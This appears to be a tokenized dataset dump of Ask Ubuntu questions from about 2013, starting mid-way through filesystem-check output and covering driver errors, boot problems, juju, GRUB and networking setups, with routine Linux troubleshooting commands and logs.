multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1597957 ( inode # 1597957 , mod time thu jun 13 13:01:32 2013 ) has 12 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information 924470 inodes used ( 45.32 % , out of 2039808 ) 10082 non-contiguous files ( 1.1 % ) 304 non-contiguous directories ( 0.0 % ) # of inodes with ind/dind/tind blocks : 0/0/0 extent depth histogram : 805576/1068/2 6435349 blocks used ( 79.02 % , out of 8144043 ) 0 bad blocks 1 large file 686126 regular files 103928 directories 162 character device files 75 block device files 0 fifos 110447 links 134162 symbolic links ( 117570 fast symbolic links ) 8 sockets -- -- -- -- -- -- 1034908 files as you can see , there are reported problems , but i ca n't fix them because `` multiply-claimed blocks already reassigned or cloned . '' so can i do something about this error , or is it meaningless ? updated i ran sudo fsck -fyc /dev/sda5 again : ~ $ sudo fsck -fyc /dev/sda5 fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) pass 1 : checking inodes , blocks , and sizes running additional passes to resolve blocks claimed by more than one inode ... pass 1b : rescanning for multiply-claimed blocks multiply-claimed block ( s ) in inode 447649 : 7803583 multiply-claimed block ( s ) in inode 787816 : 3154048 multiply-claimed block ( s ) in inode 788743 : 3154049 multiply-claimed block ( s ) in inode 788746 : 3154050 multiply-claimed block ( s ) in inode 790435 : 3154051 multiply-claimed block ( s ) in inode 799849 : 3154052 multiply-claimed block ( s ) in inode 799860 : 3154054 multiply-claimed block ( s ) in inode 803622 : 3154055 multiply-claimed block ( s ) in inode 809786 : 3154056 multiply-claimed block ( s ) in inode 809796 : 3154057 multiply-claimed block ( s ) in inode 809804 : 3154058 multiply-claimed block ( s ) in inode 810089 : 3154060 multiply-claimed block ( s ) in inode 811328 : 3154061 multiply-claimed block ( s ) in inode 816753 : 3154062 multiply-claimed block ( s ) in inode 945772 : 3154048 3154049 3154050 3154051 3154052 3154054 3154055 3154056 3154057 3154058 3154060 3154061 3154062 multiply-claimed block ( s ) in inode 953954 : 2686393 multiply-claimed block ( s ) in inode 961043 : 4204736 4204737 4204738 4204739 4204740 multiply-claimed block ( s ) in inode 1069093 : 4204736 multiply-claimed block ( s ) in inode 1069107 : 4204737 multiply-claimed block ( s ) in inode 1069125 : 4204738 multiply-claimed block ( s ) in inode 1072839 : 4204739 multiply-claimed block ( s ) in inode 1074788 : 4204740 multiply-claimed block ( s ) in inode 1228300 : 7148415 multiply-claimed block ( s ) in inode 1229036 : 7720477 multiply-claimed block ( s ) in inode 1231483 : 7783679 multiply-claimed block ( s ) in inode 1231493 : 7789279 multiply-claimed block ( s ) in inode 1231495 : 7789535 multiply-claimed block ( s ) in inode 1231497 : 7789567 multiply-claimed block ( s ) in inode 1231553 : 7797043 multiply-claimed block ( s ) in inode 1231555 : 7798085 multiply-claimed block ( s ) in inode 1231557 : 7798089 multiply-claimed block ( s ) in inode 1231559 : 7798207 multiply-claimed block ( s ) in inode 1231562 : 7798208 multiply-claimed block ( s ) in inode 1231565 : 7798245 multiply-claimed block ( s ) in inode 1231570 : 7798248 multiply-claimed block ( s ) in inode 1231575 : 7797202 multiply-claimed block ( s ) in inode 1231577 : 7797203 multiply-claimed block ( s ) in inode 1231579 : 7798204 multiply-claimed block ( s ) in inode 1231581 : 7798205 multiply-claimed block ( s ) in inode 1231583 : 7798242 multiply-claimed block ( s ) in inode 1231585 : 7798243 multiply-claimed block ( s ) in inode 1231589 : 7798265 multiply-claimed block ( s ) in inode 1231629 : 7803583 multiply-claimed block ( s ) in inode 1231865 : 7807615 multiply-claimed block ( s ) in inode 1231867 : 7807903 multiply-claimed block ( s ) in inode 1231918 : 7808031 multiply-claimed block ( s ) in inode 1231949 : 7809679 multiply-claimed block ( s ) in inode 1238918 : 2686393 multiply-claimed block ( s ) in inode 1341801 : 7720477 multiply-claimed block ( s ) in inode 1579279 : 7789279 7789535 7789567 multiply-claimed block ( s ) in inode 1579442 : 7797043 7797202 7797203 multiply-claimed block ( s ) in inode 1583545 : 7783679 multiply-claimed block ( s ) in inode 1586086 : 7148415 multiply-claimed block ( s ) in inode 1591119 : 7807615 7807903 7808031 multiply-claimed block ( s ) in inode 1597957 : 7798085 7798089 7798204 7798205 7798207 7798208 7798242 7798243 7798245 7798248 7798265 7809679 pass 1c : scanning directories for inodes with multiply-claimed blocks pass 1d : reconciling multiply-claimed blocks ( there are 55 inodes containing multiply-claimed blocks . ) file /lost+found/ # 447649 ( inode # 447649 , mod time wed aug 14 20:23:14 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 945772 ( inode # 945772 , mod time fri apr 19 16:45:15 2013 ) has 13 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 953954 ( inode # 953954 , mod time thu jul 18 11:09:04 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 961043 ( inode # 961043 , mod time fri may 17 06:23:14 2013 ) has 5 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1842491/ip_set_list.h ( inode # 1341801 , mod time fri aug 23 11:17:57 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1579279 ( inode # 1579279 , mod time thu jun 13 07:01:32 2013 ) has 3 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1579442 ( inode # 1579442 , mod time thu jun 13 07:01:05 2013 ) has 3 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1583545 ( inode # 1583545 , mod time thu jul 18 16:24:29 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1586086 ( inode # 1586086 , mod time wed aug 21 05:44:18 2013 ) has 1 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1591119 ( inode # 1591119 , mod time wed jul 24 11:19:12 2013 ) has 3 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . file /lost+found/ # 1597957 ( inode # 1597957 , mod time thu jun 13 07:01:32 2013 ) has 12 multiply-claimed block ( s ) , shared with 0 file ( s ) : multiply-claimed blocks already reassigned or cloned . pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information /dev/sda5 : 924470/2039808 files ( 1.1 % non-contiguous ) , 6435349/8144043 blocks
353204	amd catalyst driver error	so i downloaded latest amd catalystâ˘ drivers for radeonâ˘ hd 4000 , hd 3000 and hd 2000 series driver , i made it to the install , then if i wan na start installing i get a error : '' one or more tools required for installation can not be found on the system . install required tools before installing the fglrx driver . optionally , run the installer witch -force option to install without the tools . '' i 'm running on ubuntu 12.04 32-bit lts version . ( fresh installed . )
353207	custom .desktop shortcuts are not visible in unity until i logout/login	i have a custom installer that will install a .desktop file to ~/.local/share/applications . right after i install , i try to search for the new app in unity , and it can not find it . however , once i log out and then log in again , unity will now display the new app . is there any way to get the app to show up immediately without logging out and in again ?
353215	error message in software center - not in lp-ppa-pasgui	i tried to publish a review for homebank and got the error message `` package homebank not in lp-ppa-pasgui precise for precise '' . what is it trying to tell me ? i have n't removed any software sources since homebank was installed and pasgui is in the list as ( http : // ) '' ppa.launchpad.net/pasgui/pps/ubuntu precise main '' . i 'm running ubuntu 12.04 with all updates current .
353217	data downloaded during an ubuntu installation	i 'd like to know how much internet data is downloaded during an ubuntu installation .
353220	ubuntu 13.04 not booting with gigabyte gt440	i installed ubuntu 13.04 in my pc . i had ubuntu 11.10 & win7 before ( that works together correctly ) . i begin install after erasing all linux partitions ( with ubuntu installer ) . after install and reboot , ubuntu is not booting up now ! i have gigabyte gt440 vga and my main board is asus m4a78t-mle that have onboard ati vga . when i do n't use gt440 vga ( unplug the card ) , ubuntu 13.04 can boot with on board vga , but with gt440 not boot , and presents a black screen with a lot of reports of linux booting . thus hanging . what i should do now ?
353231	how to remove a relation in juju after destroying one of the associated services ?	i am trying out juju and while playing i created a service , django , and then mongodb . i associated them and then destroyed mongodb . now my django service is in an error status : agent-state-info : 'hook failed : `` relation-broken '' ' . i have tried to destroy the relation with juju destroy-relation python-django mongodb to no avail . mongodb still appears in juju status but in 'dying ' state , it 's been a few hours since i have destroyed it . i have not done any actual work on this service so i can destroy it and start again from scratch but while learning i would like to know if there is a cleaner way to solve that situation .
353233	restore ubuntu from dell laptop	i have a dell inspiron 14r that came with ubuntu 11.1 installed from the factory . i had multiple troubles and i had to re-install , for which i used an 12.04 iso that i downloaded from ubuntu site . now , the system boots but some stuff -like touchpad or gpu acceleration- is not working so i want to restore the factory version . is that possible ? some forums direct to a recovery partition , but i do n't have one ( i only see a dell utility one )
353235	how to visit a site hosted by my virtual machine ?	i 'm trying to learn django . i installed a bitnami django stack on a virtualbox with ubuntu 64 . my issue is that , when i run the server , i have no idea how to visit the web page from my host computer ( windows 7 , 64 ) . do i need to do some complex configuration in order to visit the hosted website ?
353236	ubuntu font override	how and what fonts does the ubuntu system override ? when browsing many sites i see an alternative font than verdana , overridden by ubuntu os . i would like to set up the same for my gentoo .
353237	how to remove other os to free space ?	i have installed ubuntu on my mac ( dual boot ) . i find that i 've not used the mac os at all in the last year . i need more space now and wish to delete my mac os . how can i do this ? thanks !
353239	how to install vmware workstation 9 on ubuntu 12.04 ?	how can i install vmware-workstation-9.0.0-812388.x86_64.bundle on ubuntu 12.04 ? i ran the following steps in the terminal : ls cd downloads sudo sh vmware-workstation-9.0.0-812388.x86_64.bundle ... and when i pressed enter the command line returned to the downloads folder .
353254	how to get info on my current grub / boot configuration ?	first some background : i have dual-boot windows 7 / ubuntu 13.04 on lenovo laptop . as i did the installation about 1.5 years ago and was then even more un-savvy linux user than i am now , i ca n't recall everything i did to get both oses up and running . however , i do remember that it was quite troublesome procedure ( running boot-repair at least once ) . now i 'm considering trying another linux distro in addition to ubuntu ( most likely arch ) , and this time i 'd like to do it in a way that i have an idea what i 'm doing ( and possibly learn more about 'inner workings ' of linux distros ) . so that 's enough for the background . now my question is : how do i get information on what is my current grub / boot-loader configuration ? this seems to be first and quite separate issue to consider before even dreaming about installing a third os and more advanced messing with partitions and boot .
353259	how to open templates using vim ?	using the gui , when i right-click , there is an option to open a new document that can be empty or a template . this opens ( by default ) in gedit . how do i open these templates using vim ( without modifying the original ones , so that i can use as they are later too ) ? by this i mean i do n't want to open the templates going to ~/templates .
353262	how can i deploy a new service in juju gui specifying the destination machine ?	i would like to deploy a new service in the juju gui specifying on which machine it should run . i mean the equivalent of doing juju deploy -- to 0 mysql .
353269	teamviewer does not appear in unity dash	i have a problem with teamviewer . i 'm running 13.04 and decided to get teamviewer to manage my desktop remotely . i went to the teamviewer page and downloaded my version and chose to install it through the software center . after finishing installation , nothing happens . i ca n't even find it on my dash . so i decided i 'd install it the ubuntu way ! but i 'm met with the same failure : ( anyone seen this issue happen before ? is it 13.04 ? ?
353275	new asus with ubuntu keeps freezing	i just bought a brand new asus f55a with ubuntu 12-04 and after just a couple of hours it began freezing . it only happend when i used firefox so i installed chrome instead but now it seems to be even worse . i 'm totally new to linux so it may be something simple that i 've done wrong .
353277	kubuntu no special characters with alt	this is my first question so correct me if needed . problem is , my kubuntu 12.10 does n't print my regional characters with alt ( polish ) . this happened few times earlier and always happens during regular work . one moment it 's ok , next every program treats alt+letter as shortcut in its menu . what 's the problem ? how to fix this ? ( yes , reboot fixes the problem but that does n't look like a professional solution even for a *nix noob like me ) .
353279	why 's this pcmanfm command line not working ?	pcmanfm does n't remember view-mode for specific folders . the pcmanfm.conf file in : /home/user/.config/pcmanfm/default saves view_mode= [ 0,1,2,3 ] for all folders . default being 0 ( icon view ) , i chose not to change it . now , i made a new config file called album and created a shortcut on pcmanfm desktop ( removed nautilus recently ) called videos ( which is a folder ) . since videos are better viewed as thumbnails , i set view_mode in album to 2 . here 's the exec line in videos.desktop file : exec=pcmanfm -- profile=album `` /home/user/downloads/videos '' this works fine when pcmanfm desktop is n't running . but if it is , no such settings or configs works ! so , i was wondering if there was a workaround for this.note : i 've tried this many time by killing pcmanfm desktop process and opening videos folder . it only works when desktop is n't running ! ubuntu version 12.10pcmanfm version 1.0.1
353280	add a virtual interface to the same subnet and route both	what i am trying to accomplish is extremely close to this , with one twist . i want the second `` nic '' to be a second ip address ( i guess sometimes called a virtual nic ) , added to the same physical nic ( on the same subnet , and able to get to the gateway if i specifically send a packet over this new nic ) . i know you will probably ask why the h*ll i need to do that , and as you might guess its a long , complicated answer , but the bottom line is i need : two unique addresses that can get to the internet when i bind to them specifically those interfaces be on the same subnet for ease of the remainder of the network config if it helps , the second interface need only `` behave '' when i bind to it and send packets out of it ( or packets specifically arrive to it ) . that is , i do n't need any other routing rules than that . now , i tried the most obvious which is to modify the answer above just changing eth1 to eth0:1 , however that did not work for me , resulting in rtnetlink answers : file exists and the virtual nic not actually functioning when i bound to it ( for example , with a simple test of wget -- bind-address . i feel like that solution is very close though , it just needs a little something more - please help !
353281	system requirements	i have amd athlon 2600+ ( works on 1.9 ghz ) , 768mb ddr1 ram and ati radeon 9500pro 128mb ram . can i run ubuntu 12.04 or 13.04 on this configuration ?
353287	can not get to gui in ubuntu 12.04	so , i ran sudo apt-get update and then sudo apt-get upgrade and it ran fine . beautiful ! like summer in the artic ! then i rebooted and suddenly i got : the system is running in low-graphics mode your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . we hit ok. we get 4 options : run in low-graphics mode for just one session reconfigure graphics troubleshoot the error exit to console login if i go into run in low-graphics mode for just one session or exit to console login i get to a screen that seems to be a notepad in the sense that all i can do is type stuff . if i press alt âf1 to get to the command line when i choose exit to console login i could arrive at the command line . if i use run in low-graphics mode for just one session and press alt-f1 it will remain in the notepad state and i am forced to do reisub . upon clicking on reconfigure graphics anything i click on simply refreshes and does nothing . if we click on troubleshoot the error it gets me nowhere . below is the xorg.0.log : [ 22.532 ] x.org x server 1.13.0 release date : 2012-09-05 [ 22.532 ] x protocol version 11 , revision 0 [ 22.532 ] build operating system : linux 2.6.42-37-generic i686 ubuntu [ 22.532 ] current operating system : linux ricomon27-hp-pavilion-dv2700-notebook-pc 3.5.0-40-generic # 62~precise1-ubuntu smp fri aug 23 17:59:10 utc 2013 i686 [ 22.532 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-40-generic root=uuid=4fa62aeb-cf48-44af-9f8e-9e1b572310b1 ro quiet splash vt.handoff=7 [ 22.532 ] build date : 11 april 2013 11:50:36pm [ 22.532 ] xorg-server 2:1.13.0-0ubuntu6.1~precise3 ( for technical support please see http : //www.ubuntu.com/support ) [ 22.532 ] current version of pixman : 0.28.2 [ 22.532 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 22.532 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 22.532 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : thu oct 3 12:42:47 2013 [ 22.572 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 22.572 ] ( == ) no layout section . using the first screen section . [ 22.572 ] ( == ) no screen section available . using defaults . [ 22.572 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 22.572 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 22.573 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 22.573 ] ( == ) automatically adding devices [ 22.573 ] ( == ) automatically enabling devices [ 22.573 ] ( == ) automatically adding gpu devices [ 22.573 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 22.573 ] entry deleted from font path . [ 22.573 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 22.573 ] entry deleted from font path . [ 22.573 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 22.573 ] entry deleted from font path . [ 22.573 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 22.573 ] entry deleted from font path . [ 22.573 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 22.573 ] entry deleted from font path . [ 22.573 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 22.573 ] entry deleted from font path . [ 22.573 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 22.573 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 22.573 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 22.573 ] ( ii ) loader magic : 0xb77e3620 [ 22.573 ] ( ii ) module abi versions : [ 22.573 ] x.org ansi c emulation : 0.4 [ 22.573 ] x.org video driver : 13.0 [ 22.573 ] x.org xinput driver : 18.0 [ 22.573 ] x.org server extension : 7.0 [ 22.573 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 22.576 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:2a02:103c:30cd rev 12 , mem @ 0xf4000000/1048576 , 0xd0000000/268435456 , i/o @ 0x00001800/8 [ 22.576 ] ( -- ) pci : ( 0:0:2:1 ) 8086:2a03:103c:30cd rev 12 , mem @ 0xf4100000/1048576 [ 22.576 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 22.576 ] initializing built-in extension generic event extension [ 22.576 ] initializing built-in extension shape [ 22.576 ] initializing built-in extension mit-shm [ 22.576 ] initializing built-in extension xinputextension [ 22.576 ] initializing built-in extension xtest [ 22.576 ] initializing built-in extension big-requests [ 22.576 ] initializing built-in extension sync [ 22.576 ] initializing built-in extension xkeyboard [ 22.576 ] initializing built-in extension xc-misc [ 22.576 ] initializing built-in extension security [ 22.576 ] initializing built-in extension xinerama [ 22.576 ] initializing built-in extension xfixes [ 22.576 ] initializing built-in extension render [ 22.576 ] initializing built-in extension randr [ 22.576 ] initializing built-in extension composite [ 22.576 ] initializing built-in extension damage [ 22.576 ] initializing built-in extension mit-screen-saver [ 22.576 ] initializing built-in extension double-buffer [ 22.576 ] initializing built-in extension record [ 22.577 ] initializing built-in extension dpms [ 22.577 ] initializing built-in extension x-resource [ 22.577 ] initializing built-in extension xvideo [ 22.577 ] initializing built-in extension xvideo-motioncompensation [ 22.577 ] initializing built-in extension xfree86-vidmodeextension [ 22.577 ] initializing built-in extension xfree86-dga [ 22.577 ] initializing built-in extension xfree86-dri [ 22.577 ] initializing built-in extension dri2 [ 22.577 ] ( ii ) loadmodule : `` glx '' [ 22.599 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 22.599 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 22.599 ] compiled for 1.13.0 , module version = 1.0.0 [ 22.599 ] abi class : x.org server extension , version 7.0 [ 22.599 ] ( == ) aiglx enabled [ 22.599 ] loading extension glx [ 22.599 ] ( == ) matched intel as autoconfigured driver 0 [ 22.599 ] ( == ) matched intel as autoconfigured driver 1 [ 22.599 ] ( == ) matched vesa as autoconfigured driver 2 [ 22.599 ] ( == ) matched modesetting as autoconfigured driver 3 [ 22.600 ] ( == ) matched fbdev as autoconfigured driver 4 [ 22.600 ] ( == ) assigned the driver to the xf86configlayout [ 22.600 ] ( ii ) loadmodule : `` intel '' [ 22.600 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 22.600 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 22.600 ] compiled for 1.13.0 , module version = 2.20.9 [ 22.600 ] module class : x.org video driver [ 22.600 ] abi class : x.org video driver , version 13.0 [ 22.600 ] ( ii ) loadmodule : `` vesa '' [ 22.601 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 22.601 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 22.601 ] compiled for 1.13.0 , module version = 2.3.2 [ 22.601 ] module class : x.org video driver [ 22.601 ] abi class : x.org video driver , version 13.0 [ 22.601 ] ( ii ) loadmodule : `` modesetting '' [ 22.601 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 22.601 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 22.601 ] compiled for 1.13.0 , module version = 0.5.0 [ 22.601 ] module class : x.org video driver [ 22.601 ] abi class : x.org video driver , version 13.0 [ 22.601 ] ( ii ) loadmodule : `` fbdev '' [ 22.601 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 22.601 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 22.601 ] compiled for 1.13.0 , module version = 0.4.3 [ 22.601 ] module class : x.org video driver [ 22.601 ] abi class : x.org video driver , version 13.0 [ 22.601 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) , hd graphics , hd graphics 4600 , haswell desktop ( gt3 ) , hd graphics , hd graphics 4600 , haswell mobile ( gt3 ) , hd graphics , hd graphics p4600/p4700 , haswell server ( gt3 ) , haswell ( gt1 ) , haswell ( gt2 ) , haswell ( gt3 ) , hd graphics , haswell ( gt2 ) , haswell ( gt3 ) , haswell sdv desktop ( gt1 ) , haswell sdv desktop ( gt2 ) , haswell sdv desktop ( gt3 ) , haswell sdv mobile ( gt1 ) , haswell sdv mobile ( gt2 ) , haswell sdv mobile ( gt3 ) , haswell sdv server ( gt1 ) , haswell sdv server ( gt2 ) , haswell sdv server ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell ult desktop ( gt1 ) , haswell ult desktop ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4400 , hd graphics 5000 , haswell ult server ( gt1 ) , haswell ult server ( gt2 ) , iris ( tm ) graphics 5100 , haswell ult ( gt1 ) , haswell ult ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4200 , iris ( tm ) graphics 5100 , haswell crw desktop ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw mobile ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw server ( gt1 ) , haswell crw server ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , valleyview po board [ 22.603 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 22.603 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 22.603 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 22.603 ] ( ++ ) using vt number 7 [ 22.603 ] ( ii ) intel ( 0 ) : using device path '/dev/dri/card0' [ 22.603 ] ( ww ) falling back to old probe method for vesa [ 22.603 ] ( ww ) falling back to old probe method for modesetting [ 22.603 ] ( ww ) falling back to old probe method for fbdev [ 22.603 ] ( ii ) loading sub module `` fbdevhw '' [ 22.603 ] ( ii ) loadmodule : `` fbdevhw '' [ 22.603 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 22.603 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 22.603 ] compiled for 1.13.0 , module version = 0.0.2 [ 22.603 ] abi class : x.org video driver , version 13.0 [ 22.604 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 22.604 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 22.604 ] ( == ) intel ( 0 ) : rgb weight 888 [ 22.604 ] ( == ) intel ( 0 ) : default visual is truecolor [ 22.604 ] ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) 965gm [ 22.604 ] ( ** ) intel ( 0 ) : relaxed fencing enabled [ 22.604 ] ( ** ) intel ( 0 ) : wait on swapbuffers ? enabled [ 22.604 ] ( ** ) intel ( 0 ) : triple buffering ? enabled [ 22.604 ] ( ** ) intel ( 0 ) : framebuffer tiled [ 22.604 ] ( ** ) intel ( 0 ) : pixmaps tiled [ 22.604 ] ( ** ) intel ( 0 ) : 3d buffers tiled [ 22.604 ] ( ** ) intel ( 0 ) : swapbuffers wait enabled [ 22.604 ] ( == ) intel ( 0 ) : video overlay key set to 0x101fe [ 22.604 ] ( ii ) intel ( 0 ) : output lvds1 has no monitor section [ 22.605 ] ( -- ) intel ( 0 ) : found backlight control interface /sys/class/backlight/acpi_video0 [ 22.620 ] ( ii ) intel ( 0 ) : output vga1 has no monitor section [ 22.909 ] ( ii ) intel ( 0 ) : output tv1 has no monitor section [ 22.909 ] ( ii ) intel ( 0 ) : edid for output lvds1 [ 22.909 ] ( ii ) intel ( 0 ) : manufacturer : lpl model : 132 serial # : 0 [ 22.909 ] ( ii ) intel ( 0 ) : year : 2008 week : 0 [ 22.909 ] ( ii ) intel ( 0 ) : edid version : 1.3 [ 22.909 ] ( ii ) intel ( 0 ) : digital display input [ 22.909 ] ( ii ) intel ( 0 ) : max image size [ cm ] : horiz . : 30 vert . : 19 [ 22.909 ] ( ii ) intel ( 0 ) : gamma : 2.20 [ 22.909 ] ( ii ) intel ( 0 ) : no dpms capabilities specified [ 22.909 ] ( ii ) intel ( 0 ) : supported color encodings : rgb 4:4:4 ycrcb 4:4:4 [ 22.909 ] ( ii ) intel ( 0 ) : first detailed timing is preferred mode [ 22.909 ] ( ii ) intel ( 0 ) : redx : 0.584 redy : 0.347 greenx : 0.324 greeny : 0.542 [ 22.909 ] ( ii ) intel ( 0 ) : bluex : 0.158 bluey : 0.145 whitex : 0.313 whitey : 0.329 [ 22.909 ] ( ii ) intel ( 0 ) : manufacturer 's mask : 0 [ 22.909 ] ( ii ) intel ( 0 ) : supported detailed timing : [ 22.909 ] ( ii ) intel ( 0 ) : clock : 69.3 mhz image size : 304 x 190 mm [ 22.909 ] ( ii ) intel ( 0 ) : h_active : 1280 h_sync : 1328 h_sync_end 1360 h_blank_end 1405 h_border : 0 [ 22.909 ] ( ii ) intel ( 0 ) : v_active : 800 v_sync : 803 v_sync_end 809 v_blanking : 822 v_border : 0 [ 22.909 ] ( ii ) intel ( 0 ) : lgphilipslcd [ 22.909 ] ( ii ) intel ( 0 ) : lp141wx3-tln2 [ 22.909 ] ( ii ) intel ( 0 ) : edid ( in hex ) : [ 22.909 ] ( ii ) intel ( 0 ) : 00ffffffffffff00320c320100000000 [ 22.909 ] ( ii ) intel ( 0 ) : 00120103801e13780ab3859558538a28 [ 22.909 ] ( ii ) intel ( 0 ) : 25505400000001010101010101010101 [ 22.909 ] ( ii ) intel ( 0 ) : 010101010101121b007d502016303020 [ 22.909 ] ( ii ) intel ( 0 ) : 360030be100000180000000000000000 [ 22.909 ] ( ii ) intel ( 0 ) : 00000000000000000000000000fe004c [ 22.909 ] ( ii ) intel ( 0 ) : 475068696c6970734c43440a000000fe [ 22.909 ] ( ii ) intel ( 0 ) : 004c503134315758332d544c4e3200a7 [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 320x240 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 400x300 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 512x384 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 640x480 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 640x512 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 800x600 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 896x672 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 928x696 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 960x720 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 576x432 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 680x384 '' ( doublescan mode not supported ) [ 22.910 ] ( ii ) intel ( 0 ) : not using default mode `` 700x525 '' ( doublescan mode 